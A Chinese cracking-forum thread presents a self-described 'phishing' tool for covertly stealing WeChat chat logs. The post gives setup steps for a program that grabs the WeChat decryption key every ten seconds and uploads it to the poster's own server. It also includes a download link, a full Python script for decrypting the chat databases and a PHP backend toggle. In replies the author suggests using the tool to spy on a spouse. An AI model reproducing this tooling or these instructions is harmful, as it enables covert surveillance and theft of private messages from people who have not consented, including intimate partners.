吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 52658|回复: 534
上一主题 下一主题
收起左侧

[原创工具] Wx取证工具 利用工具钓鱼获取聊天记录

    [复制链接]
跳转到指定楼层
楼主
pap 发表于 2023-5-11 09:21 回帖奖励
本帖最后由 pap 于 2023-5-11 14:22 编辑

本文仅用于技术讨论,切勿用于违法途径,后果自负!
本文仅用于技术讨论,切勿用于违法途径,后果自负!
本文仅用于技术讨论,切勿用于违法途径,后果自负!
重要的事情说三遍
前言#
在取证过程中,对微信本地数据库的提取是非常重要的工作。当然取证的内容可能不能作为法律依据,但是可以让你获得一些情报【绿帽】
程序仅供测试使用,为防止用于违法途径,已在电脑图标栏留了图标和标题



原理讲解
微信聊天记录储存在本地文件夹中,但是被加密了,需要微信key来解密、
我们的工具就是循环获取微信Key 10秒钟获取一次,当获取微信的密钥时候,
拿Key解密微信本地存储的DB文件即可获取聊天记录




程序说明
你需要一台服务器搭建后端,服务器用于搭建后端 设置软件是否开始获取微信KEY等信息
和把数据上传到云端


因为软件10秒钟获取一次微信数据并保存到C盘根目录Westcity.txt 中 和 C盘根目录文件夹备份文件中 并上传云端API,所以在后端设置了一个开关功能

搭建教程
1.在服务器搭建后端API,上传直接就可以使用,没做什么限制,仅限自己测试使用
2.将程序【API.txt/备份文件/WXTZ.exe/Westcity.exe】全部放到c盘根目录,将API.txt文件内接口改为自己的域名
3.运行后在网站后台设置是否开始获取后运行WXTZ.exe

解密数据库[获取到Key后解密Db文件,我自己用的那个解密文件就不给你们发了,因为我不确定是否存在后门,给你们一个网络上的python开源脚本]
打开微信数据文件所在的目录,例如我的是 D:\Documents\WeChat Files\wxid_r5xxxxxxxxxx12\Msg,将这里面的所有.db文件复制到一个新的文件夹中(别忘了Multi文件夹中还有一些),然后可以通过下面的 Python 脚本进行解密(在前两行输入好你的文件所在目录):
<--代码开始






[Python] 纯文本查看 复制代码
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
input_pass = '解密密钥'
input_dir = r'D:\微信数据库文件'
 
import ctypes
import hashlib
import hmac
from pathlib import Path
 
from Crypto.Cipher import AES
 
SQLITE_FILE_HEADER = bytes('SQLite format 3', encoding='ASCII') + bytes(1)
IV_SIZE = 16
HMAC_SHA1_SIZE = 20
KEY_SIZE = 32
DEFAULT_PAGESIZE = 4096
DEFAULT_ITER = 64000
 
password = bytes.fromhex(input_pass.replace(' ', ''))
 
 
def decode_one(input_file):
    input_file = Path(input_file)
 
    with open(input_file, 'rb') as (f):
        blist = f.read()
    print(len(blist))
    salt = blist[:16]
    key = hashlib.pbkdf2_hmac('sha1', password, salt, DEFAULT_ITER, KEY_SIZE)
    first = blist[16:DEFAULT_PAGESIZE]
    mac_salt = bytes([x ^ 58 for x in salt])
    mac_key = hashlib.pbkdf2_hmac('sha1', key, mac_salt, 2, KEY_SIZE)
    hash_mac = hmac.new(mac_key, digestmod='sha1')
    hash_mac.update(first[:-32])
    hash_mac.update(bytes(ctypes.c_int(1)))
 
    if hash_mac.digest() == first[-32:-12]:
        print('Decryption Success')
    else:
        print('Password Error')
    blist = [
        blist[i:i + DEFAULT_PAGESIZE]
        for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)
    ]
 
    with open(input_file.parent / f'decoded_{input_file.name}', 'wb') as (f):
        f.write(SQLITE_FILE_HEADER)
        t = AES.new(key, AES.MODE_CBC, first[-48:-32])
        f.write(t.decrypt(first[:-48]))
        f.write(first[-48:])
        for i in blist:
            t = AES.new(key, AES.MODE_CBC, i[-48:-32])
            f.write(t.decrypt(i[:-48]))
            f.write(i[-48:])
 
 
if __name__ == '__main__':
    input_dir = Path(input_dir)
    for f in input_dir.glob('*.db'):
        decode_one(f)




代码结束-->


这个脚本可以将你设置的目录下的所有.db文件进行解密,例如对于abc.db,会生成decoded_abc.db文件。特别说明的是,如果复制出来后你的Multi文件夹还是独立的一个文件夹,需要分别对D:\微信数据库文件操作和D:\微信数据库文件\Multi进行操作。另外,xinfo.db无需解密,可直接查看。解密后,你就可以通过任意一个你喜欢的数据库可视化查看工具查看这些数据库了。
获取成功C盘文件夹和云端展示
下载链接:https://pan.baidu.com/s/15G07hBJvcTwwuE-4O9jZJQ?pwd=frwd 提取码:frwd

image.png (188.35 KB, 下载次数: 22)

image.png

免费评分

参与人数 138吾爱币 +129 热心值 +120 收起 理由
laopan138 + 1 + 1 谢谢@Thanks!
a714714a2008 + 1 + 1 用心讨论,共获提升!
yuanhu0 + 1 感谢您的宝贵建议,我们会努力争取做得更好!
hellomonkiy + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
1821654541 + 1 谢谢@Thanks!
★天若有情★ + 1 + 1 我很赞同!
k660066 + 1 热心回复!
hanc44 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
chao8709 + 1 + 1 我很赞同!
鸭鸭鸭? + 1 + 1 谢谢@Thanks!
soiomn + 1 + 1 谢谢@Thanks!
老唐不老 + 1 我很赞同!
zenmysll + 1 新版微信的有吗
super、tien + 1 + 1 用心讨论,共获提升!
ddlt + 1 + 1 谢谢@Thanks!
WilsonHoo + 1 + 1 我很赞同!
someone01 + 1 + 1 热心回复!
z6hhatl8ghh + 1 + 1 谢谢@Thanks!
Y33 + 1 我很赞同!
Jellyhang + 1 + 1 我很赞同!
mumu2021 + 1 + 1 谢谢@Thanks!
提莫队长啊 + 1 + 1 我很赞同!
hhtwy + 1 + 1 谢谢@Thanks!
ztt19881114 + 1 我很赞同!
talker1111 + 1 谢谢@Thanks!
uyucn + 1 谢谢@Thanks!
weiwei9665 + 1 + 1 热心回复!
Marlboro233 + 1 + 1 热心回复!
puny + 1 + 1
ALDShD + 1 + 1 鼓励转贴优秀软件安全工具和文档!
lvevil + 1 + 1 用心讨论,共获提升!
dj7800 + 1 用心讨论,共获提升!
zhujunpeng + 1 + 1 热心回复!
Bluestarry + 1 + 1 鼓励转贴优秀软件安全工具和文档!
ironmanxxl + 1 + 1 我很赞同!
liguobin + 1 + 1 牛人,厉害的一塌糊涂,膜拜!
iloveyoulove + 1 + 1 热心回复!
maiwens + 1 + 1 谢谢@Thanks!
huohuo2394 + 1 我很赞同!
nirnovo + 1 + 1 热心回复!
wangyongdesign + 1 + 1 谢谢@Thanks!
ondel + 1 + 1 谢谢@Thanks!
pxj1983 + 1 + 1 谢谢@Thanks!
sunick004 + 1 + 1 谢谢@Thanks!
黑心虎 + 1 热心回复!
suy + 1 热心回复!
pandasd + 1 + 1 热心回复!
billsmiless + 3 + 1 谢谢@Thanks!
生活的回音 + 1 谢谢@Thanks!
bugof52pj + 1 谢谢@Thanks!
wanjingbo + 1 + 1 谢谢@Thanks!
Szyk + 1 + 1 用心讨论,共获提升!
qqazmin + 1 + 1 已经处理,感谢您对吾爱破解论坛的支持!
KONKAv983 + 1 + 1 谢谢@Thanks!
a33463 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
r061225 + 1 + 1 谢谢@Thanks!
z7138910 + 1 + 1 热心回复!
YuYuanyuan + 1 + 1 我很赞同!
miloc + 1 + 1 用心讨论,共获提升!
sfwsfc1985 + 1 + 1 我很赞同!
尹铭 + 1 + 1 对于小白来说还是有点难度的
Frosty + 1 用心讨论,共获提升!
lishengde322 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
xjliwenhao + 1 我很赞同!
Spacecraft + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
98km6 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
发抖的小喵喵 + 1 + 1 热心回复!
ag129 + 1 + 1 谢谢@Thanks!
tvrcfdfe + 1 + 1 我很赞同!
winterchen + 1 + 1 谢谢@Thanks!
yzhl + 1 我很赞同!
aa5309 + 1 我很赞同!
aibaisong + 1 + 1 用心讨论,共获提升!
wuqing89403 + 1 + 1 谢谢@Thanks!
xjlws555 + 1 热心回复!
DaiTian + 1 + 1 谢谢 @Thanks!
1740555QAZ + 1 + 1 鼓励转贴优秀软件安全工具和文档!
zxcroot + 1 + 1 用心讨论,共获提升!
dechong + 1 谢谢@Thanks!
奥怪 + 2 + 1 我很赞同!
lyslxx + 1 + 1 我很赞同!
cntjgaowei + 1 + 1 谢谢@Thanks!
bobohouhou + 1 + 1 谢谢@Thanks!
huih78 + 1 谢谢@Thanks!
万能的楼下小黑 + 1 + 1 谢谢@Thanks!
itsdandy + 1 谢谢@Thanks!
晚风吹麦浪 + 1 热心回复!
Issacclark1 + 1 谢谢@Thanks!
huayugongju + 1 微信更新了, 在3.7.0.30之后的版本都不能通过这种方式读取信息了
sin.l + 1 + 1 谢谢@Thanks!
Hezee + 1 谢谢@Thanks!
zhanghao521 + 1 用心讨论,共获提升!
hackabi + 1 不支持新版本微信
Yanggq + 1 + 1 鼓励转贴优秀软件安全工具和文档!
wwww7788549 + 1 热心回复!
ACBur + 1 + 1 牛的
a85401234 + 1 谢谢@Thanks!
huwen945 + 1 + 1 谢谢@Thanks!
飞吧土豆 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
cwazl + 1 这个必须要支持!

查看全部评分

本帖被以下淘专辑推荐:

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

来自 2#
 楼主| pap 发表于 2023-5-11 09:25 |楼主
对了忘记了一个东西,云盘后端index.php里的php代码有一点问题,修改一下,可以直接覆盖PHP代码
[PHP] 纯文本查看 复制代码
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
<?php
if(isset($_POST["sub"])){
$files=fopen("yz.txt","w") or die("非法操作!");
$txt=1;
fwrite($files,$txt);
fclose($files);
  
}
if(isset($_POST["sub2"])){
$files2=fopen("yz.txt","w") or die("非法操作!");
$txt2=2;
fwrite($files2,$txt2);
fclose($files2);
   
}
?>


把123改一下,当时用完的时候我随便改了一下,你们改回来就好
推荐
law.liu 发表于 2023-5-11 10:06
这代码里面decode_one(f)”  似乎缺少一行代码的结束引号,修改为decode_one(f)

以下是对代码进行漏洞检查的几点建议:
密钥硬编码: 密钥 "解密密钥" 在代码中是硬编码的,这会使密钥在代码中可见,增加了密钥泄露的风险。建议将密钥存储在安全的地方,比如配置文件或环境变量中,以便更好地保护密钥的机密性。

弱密码推导函数: 代码中使用了hashlib.pbkdf2_hmac函数进行密码推导,但使用SHA-1作为哈希算法,这是一个较弱的算法。建议改用更强的哈希算法,如SHA-256或SHA-512,并根据具体情况增加迭代次数以增加密码推导的复杂度。

密钥长度: 默认的KEY_SIZE为32,这是AES-256的密钥长度,但代码中并没有验证输入密钥的长度是否为32字节。建议添加密钥长度的验证,确保输入密钥的正确性。

密码错误处理: 当密码错误时,代码只打印"Password Error",但没有其他的错误处理机制。建议添加适当的异常处理,如抛出异常或返回错误码,以便在调用该代码的地方进行错误处理。

安全性审计: 代码中使用了一些加密和哈希算法,但没有对其进行安全性审计。建议定期进行安全性审计,以确保使用的算法和实现没有已知的安全漏洞。

免费评分

参与人数 2吾爱币 +2 收起 理由
Koardor + 1 分析的很专业
马潇洒 + 1 用心讨论,共获提升!

查看全部评分

推荐
 楼主| pap 发表于 2023-5-11 14:27 |楼主
迷失自我 发表于 2023-5-11 11:20
这个和取证的定义有点相悖啊,取证是在合法的前提下,既然安装在别人电脑上,你怎么会有机会去安装呢,既然 ...

这个程序开发的本意我就是用来调查一些事情,最后排查到人了,具体使用过程还得因人而异,家庭调查是一个很不错的选择,但是我觉得夫妻之前还是要多一些信任
推荐
尹铭 发表于 2023-5-15 14:47
yinhuazuimeng 发表于 2023-5-12 09:44
cool  回家仔细看 先插个眼 老哥牛的

老哥研究出来能求一份不  菜鸡只能用现成的~~!

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
hengyx + 1 + 1 我很赞同!

查看全部评分

推荐
 楼主| pap 发表于 2023-5-12 10:51 |楼主
海贼阿猪 发表于 2023-5-11 23:20
这个可以哦,楼主能搞个备份导出聊天记录的不

官方有这个功能
推荐
 楼主| pap 发表于 2023-5-11 10:06 |楼主
jway 发表于 2023-5-11 09:54
楼主,深信服抓取企业内部员工的聊天记录,是不是也是这个理呢?

电脑上的原理应该就是这样获取的,手机有手机的方法
推荐
 楼主| pap 发表于 2023-5-11 10:04 |楼主
Takitooru 发表于 2023-5-11 09:52
不是我的知识领域,感谢分享,问一下,这个记录是指所有聊天信息吗?是否包括图片、红包、转账、视频等等? ...

本地的信息大概都记录在DB文件中,好友信息之类的都有,我就拿来看聊天记录

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
Takitooru + 1 + 1 用心讨论,共获提升!

查看全部评分

推荐
 楼主| pap 发表于 2023-5-11 09:32 |楼主
一只大菜猫 发表于 2023-5-11 09:29
厉害啊,不过对于小白来说上手有点难度

我觉得只要稍微懂一点点技术的就可以上手,如果一点点技术也不懂的我不建议使用这个,毕竟是一把双刃剑
推荐
 楼主| pap 发表于 2023-10-16 08:52 |楼主
ljkund 发表于 2023-10-11 15:05
php已改,服务器端应该没问题了,但前端Westcity.exe不支持64系统,没法用了,大佬求救

微信版本太新了,新版本的微信已经修复了这个获取方法
推荐
 楼主| pap 发表于 2023-10-11 14:21 |楼主
ljkund 发表于 2023-10-11 10:35
并没有生效,点击获取之后会变成-当前状态: 321 (1=循环运行 2=暂停运行)
也没有数据记录,前端已经放 ...

PHP文件需要修改一下
推荐
 楼主| pap 发表于 2023-6-5 20:49 |楼主
要微信新版的把Westcity.exe换成Github上的新版获取Key软件之后把名字改成Westicty.exe替换一下就可以了
4#
bxmail 发表于 2023-5-11 09:27
感谢楼主分享
5#
一只大菜猫 发表于 2023-5-11 09:29
厉害啊,不过对于小白来说上手有点难度
6#
jfaboy 发表于 2023-5-11 09:33
思路与源代码,我收藏了。感谢
7#
Noangler 发表于 2023-5-11 09:35
感谢分享,支持一下!
8#
lianliangfo 发表于 2023-5-11 09:36
本帖最后由 lianliangfo 于 2023-5-11 09:39 编辑

谢谢分享,看看。
9#
sin.l 发表于 2023-5-11 09:38
卧槽,这个厉害了
10#
shbyl521 发表于 2023-5-11 09:39
这都可以啊,高端局。回家试一下。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2025-2-3 18:14

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表